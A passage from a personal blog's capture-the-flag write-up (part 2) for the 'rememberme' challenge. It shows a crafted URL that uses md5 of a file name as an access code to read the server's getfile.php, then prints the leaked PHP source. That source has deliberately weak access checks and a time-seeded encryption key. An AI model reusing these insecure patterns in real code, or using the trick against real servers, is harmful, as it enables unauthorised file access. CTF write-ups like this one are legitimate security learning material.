wakatonoの戯れメモ

はてなダイアリーから引っ越してきました。

3dub 4 rememberme write up(2) - obtaining getfile.php source code by using getfile.php.

Next step: you can get getfile.php by using itself.

Acecss to URL like below:
http://rememberme.shallweplayaga.me/getfile.php?filename=getfile.php&accesscode=[result of `echo -n getfile.php | md5sum`]

You can obtain the result like below:


Acces granted to getfile.php!




$value = time();
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode){
echo "Acces granted to $filename!

";
srand($value);
if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
$data = file_get_contents($filename);
if ($data !== FALSE) {
if ($filename == "key.txt") {
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
echo base64_encode($cyphertext);
}
else{
echo nl2br($data);
}

}
else{
echo "File does not exist";
}
}
else{
echo "File does not exist";
}

}
else{
echo "Invalid access code";
}
?>

You know your mission is to read key.txt .